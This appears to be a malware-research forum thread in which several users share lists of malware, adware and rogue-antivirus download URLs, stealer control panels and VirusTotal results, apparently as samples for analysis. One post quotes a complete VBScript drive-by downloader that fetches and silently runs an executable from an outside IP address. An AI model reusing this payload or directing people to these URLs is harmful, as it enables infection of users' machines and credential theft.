daily something......

[JohnC]

Thank you.

[sowhat-x]

hxxp://193.33.61.169/cntr.gif
hxxp://91.203.92.25/hvha/4683lt.exe
hxxp://ksn.a1001186.wrs.flutix.com/meane.stf
hxxp://lolika.cn/docs/us.txt
hxxp://lolika.cn/docs/us2.txt
hxxp://lolika.cn/docs/us3.txt
hxxp://www.mediacodec.co.cc/justplayit.exe

Pinches here...

hxxp://ks4sk.fatal.ru/1/1.php
hxxp://mechta2.freehostia.com    -> Open dir,check for logs and other stuff there...
hxxp://skkeyg.freehostia.com      -> Open dir,check for logs and other stuff there...

Hunting for Pinches really pays back sometimes...

hxxp://c.bestnews.cc/e/buf.png -> Result: 0/36 (0%)
http://www.virustotal.com/analisis/54a9ba01bdd03fce710d9cceafb0d2e4

hxxp://c.bestnews.cc/e/mov.qt -> Result: 2/36 (5.56%)
http://www.virustotal.com/analisis/5ac531f64205150158da7b6d6153e8ea

hxxp://c.bestnews.cc/file.php?o=7&q=2&w=fire -> Result: 13/36 (36.12%)
http://www.virustotal.com/analisis/bad64f314a091e12a1957a252cd3f5c0

Also digged a webshell from there...

hxxp://bestnews.cc/tools.rar

All stuff from bestnews.cc added in attachment,note that it's NOT password-protected...

[lanvin]

Code: [Select]

http://91.203.92.25/hvha626/s6c4n6s.exe
http://91.203.92.25/hvha123/ex32de.exe
http://ksn.a.wrs.mcboo.com/17PHolmes.cmt
http://ksn.a.wrs.flutix.com/meane.stf
http://lolika.cn/docs/tips.txt (MZ)
dig.......

[lanvin]

Code: [Select]

http://2.trojan8.com/dd/1.exe
http://2.trojan8.com/dd/2.exe
http://2.trojan8.com/dd/6.exe
http://2.trojan8.com/dd/9.exe

[lanvin]

Code: [Select]

zango.com 
http://downloads.zango.com/zangogames/chamber/setupchamber2848.exe
http://downloads.zango.com/zangogames/dvg/setupdavid2365.exe
http://downloads.zango.com/zangogames/zangotv/setupzangotv2593.exe
http://downloads.zango.com/zangogames/library/setuplibrary2797.exe
http://ftp.surfnet.nl/simtel/win95/secsys/passpectpro32.exe

180solutions.com 
http://bis.180solutions.com/downloads/msbb.exe


hotbar.com 
http://installs.hotbar.com/installs/hotbar/programs/hotbar.exe
http://www.hbdownloads.com/installs/hotbar/programs/hotbarinst.exe
http://installs.hotbar.com/installs/hbtools/programs/hbtools.exe
http://installs.hotbar.com/installs/hbtools/programs/hbtools.cab
http://installs2.hotbar.com/installs/hotbar/programs/hotbar.exe


zangocash.com
http://static.zangocash.com/Setup/53/Zango/Setup.exe 
http://static.zangocash.com/Setup/53/Seekmo/Setup.exe 


please dig

Code: [Select]

gophergas.com
albinoblacksheep.com 
simtel.net 

[SysAdMini]

Code: [Select]

www.ulitka.de
has code

Code: [Select]

<SCRIPT language=VBScript>
    on error resume next

    dl = "http://210.202.194.167/banco.exe"

    Set df = document.createElement("object")

    df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"

    str="Microsoft.XMLHTTP"

    Set x = df.CreateObject(str,"")

    a1="Ado"

    a2="db."

    a3="Str"

    a4="eam"

    str1=a1&a2&a3&a4

    str5=str1

    set S = df.createobject(str5,"")

    S.type = 1

    str6="GET"

    x.Open str6, dl, False

    x.Send

    fname1="http://www.ulitka.de/index2.html"

    set F = df.createobject("Scripting.FileSystemObject","")

    set tmp = F.GetSpecialFolder(2) ' Get tmp folder

    fname1= F.BuildPath(tmp,fname1)

    S.open

    S.write x.responseBody

    S.savetofile fname1,2

    S.close

    set Q = df.createobject("Shell.Application","")

    Q.ShellExecute fname1,"","","open",0

    </SCRIPT>


to download

Code: [Select]

http://210.202.194.167/banco.exe

[JohnC]

Thanks.

[lanvin]

Code: [Select]

prtectionactivescan.com

http://softwaredesign6.com/2009/download/trial/A9loader_770522160214.exe
http://prtectionactivescan.com/2009/download/trial/A9loader_770522164720.exe
http://prtectionactivescan.com/2009/download/trial/A9loader_77052201.exe
http://prtectionactivescan.com/2009/download/trial/A9loader_770522164437.exe

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.freewebs.com/chipxinh503/GirlKuTe.exe

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.cao-2.cn/Real10.js
http://www.cao-1.cn/Real10.js
http://202.106.195.23:6688/aicss_test241.css (invalid)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

as-pro-xp-download.com

http://files.as-pro-xp-download.com/load/setup_100525_3_.exe 
http://files.as-pro-xp-download.com/load/setup_110084_3_.exe 
http://files.as-pro-xp-download.com/load/setup_110102_3_.exe 
http://files.as-pro-xp-download.com/load/setup_100525_6_.exe 
http://files.as-pro-xp-download.com/load/setup_110151_3_.exe

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






[lanvin]

Code: [Select]

91.121.138.222

http://91.121.138.222/~warman24/Setup_ver1.1706.0.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
allinonespy.com

http://www.allinonespy.com/all-in-one-spy.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.ppexe.com/

http://www.ppexe.com/comine/2.exe 
http://www.ppexe.com/comine/mfrj.exe 
http://www.ppexe.com/comine/dwbins.exe   
http://www.ppexe.com/comine/wowoaa.exe 
http://www.ppexe.com/comine/mf.exe 
http://www.ppexe.com/comine/ffxi369.exe 
http://www.ppexe.com/new/1.exe 
http://www.ppexe.com/comine/mf.exe
http://www.ppexe.com/comine/db820.exe


[lanvin]

Code: [Select]

blazingtools.com

http://www.blazingtools.com/downloads/i_bpk2003.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
swmirror.com

http://dreamingsoft.swmirror.com/fcsetup.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
blazingtools.com

http://www.blazingtools.com/downloads/i_bpk2003.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
facaizhifuok.cn

http://facaizhifuok.cn/hb/1.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


[CM_MWR]

Thanks Lanvin,

Some fun to play with

hxxp://rtrbenews.com/svchost.exe
hxxp://rtrbenews.com/svchost2.exe
hxxp://rtrbenews.com/svchost3.exe
hxxp://ontilop.net/_stub.exe
hxxp://wirexgold.com/explorer.exe
hxxp://rondolook.net/_stub.exe
hxxp://rondolook.net/123.exe
hxxp://wapbrazil.nexenservices.com/image/Gbsvs.exe
hxxp://79.135.167.18/sl32.exe
hxxp://79.135.167.18/scan4.exe
hxxp://79.135.167.18/cgi-bin/index.cgi?test2
hxxp://79.135.167.18/gpls32.exe1
hxxp://www.blogouf.com/images/closeframe.gif
hxxp://www.blogouf.com/images/logo-blogoufbig.gif
hxxp://wapbrazil.nexenservices.com/image/sys_Java.exe
hxxp://66.90.104.196/Autoupdate/Setup_ver1.1494.0.exe
hxxp://loaddds.com/file.exe
hxxp://sexoon.ifrance.com/link.jpg
hxxp://78.157.143.251/bho/msfont.dll
hxxp://www.gondolatriveneto.com/img/categorie/9_mai_big.jpg
hxxp://www.modulog2008.hpgvip.com.br/themida.jpg
hxxp://www.modulog2008.hpgvip.com.br/dynamic.jpg
hxxp://www.host1550.com/modulos/modulo.jpg
hxxp://www.host1550.com/modulos/gera.jpg
hxxp://www.host1550.com/modulos/plugin.jpg
hxxp://www.host1550.com/modulos/net.jpg
hxxp://www.host1550.com/modulos/msn.jpg
hxxp://www.host1550.com/modulos/orkut.jpg
hxxp://lovelypornovideo.net/load.php?aff=&/HDVideoCodec_ver1..0.exe
hxxp://pornotube30.net/getsoft/79_003.exe
hxxp://lidahua.3322.org/gz.exe
hxxp://lidahua.3322.org/jzllw.exe
hxxp://lidahua.3322.org/doudou.exe
hxxp://lidahua.3322.org/Down1.exe
hxxp://lidahua.3322.org/waigua.exe
hxxp://sortesorte009.mail333.su/familia.gif
hxxp://www.death-note.biz/up/img/22752.exe
hxxp://satellife.info/?&v=2608kj&lid=1033
hxxp://v2count.net/cc/ccdo.php?affid=5
hxxp://v2count.net/cc/srtytrewqertytrew.php?affid=5&code1=HOPH&code2=1257
hxxp://v2count.net/out/search.jpg
hxxp://v2count.net/out/winlogon.jpg
hxxp://v2count.net/out/tibs.jpg
hxxp://v2count.net/out/tool.jpg
hxxp://v2count.net/out/proxy.jpg
hxxp://russia-vs-georgia.org/admin/load.php?id=500357855
hxxp://freee.lviv.name/antivir/scan.exe
hxxp://freee.lviv.name/antivir/serv.exe
hxxp://freee.lviv.name/antivir/Setup_ver1.1254.0.exe
hxxp://freee.lviv.name/antivir/silent.exe
hxxp://www.ltb.com.co/portal/modules/pagesetter/doc/default/irs_efill.php

---------------------

208.66.194.232/40E8000842CFEBBCE21EFAC86C0000006866000000007600000147EB0005306A70777F
78.157.142.26/files/42/v2test7/file.exe
85.255.118.29/ppc/config.php?v=19&u=3259&acln=en-us&s=hxxp://www.google.com/&sch=n
85.255.118.29/ppc/config.phpchk
91.203.92.25/hvha626/s6c4n6s.exe
a486.g.akamai.net/wzcline23.exe
anti-virus-xp.net/images/1221042566/59d422a3203c189a5a485ed62282d44d/f13b3635-68ca-4d6d-95e4-3fe0ff04661f.gif
anti-virus-xp.net/images/1221042578/59d422a3203c189a5a485ed62282d44d/f13b3635-68ca-4d6d-95e4-3fe0ff04661f.ok?id=16
anti-virus-xp.net/images/1221043179/59d422a3203c189a5a485ed62282d44d/f13b3635-68ca-4d6d-95e4-3fe0ff04661f.gif
googlescanners-360.com/2009/100/freescan.php?aid=880724
googlescanners-360.com/2009/download/trial/AV2009Install_880724.exe
total-secure2009.com/download.php
totalsecuredownload.com/TotalSecure2009.exe
xww.panel911.com/traffic/in.cgi?google1
xww.panel911.com/traffic/in.cgi?hunter
zonephp.com/del/us.exe
zonephp.com/del/us.php?1=duhme_0008dc42&i=
zonephp.com/del/us.php?2=duhme_0008dc42&n=0&v=16778773&i=&s=0&sp=0&lcp=0&pr=0
zonephp.com/del/us.php?2=duhme_0008dc42&n=1&v=16778773&i=&s=0&sp=0&lcp=0&pr=0
zonephp.com/del/userror
zonephp.com/ld.php?v=1&id=27718&rs=2087256932&cc=0
zonephp.com/ld.php?v=1&rs=2087256932

[lanvin]

Thanks Lanvin,

Some fun to play with

~~~~~

Hi  CM_MWR,
Thank you very much 

[sowhat-x]

hxxp://mr-z.ru/logs2/BlackWM222.exe

hxxp://0smp.ru/gpack/admin.php
hxxp://finito.fi.funpic.org/black/auth.php

hxxp://forsakens.freehostia.com/gate/
hxxp://pinch.freehostia.com/
hxxp://test.bboys.tu2.ru/gate.php
hxxp://www.tihvin.tu2.ru/italy/gate.php

[sowhat-x]

And a special one as well,lol...that also earned Google's malware prevention warning,he-he...
http://www.google.com/search?hl=en&q=dlockley.com

hxxp://dlockley.com/

[lanvin]

Code: [Select]

http://mdrop.md.funpic.org/habbo%20tools/flooder/macrotool.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://hipapatam.com/Client20.1531.0.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://dl-updates.freehostia.com/vc.txt    (pe)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.bopings.com/a.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.kasdbrs.com/ld_vp002.exe
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~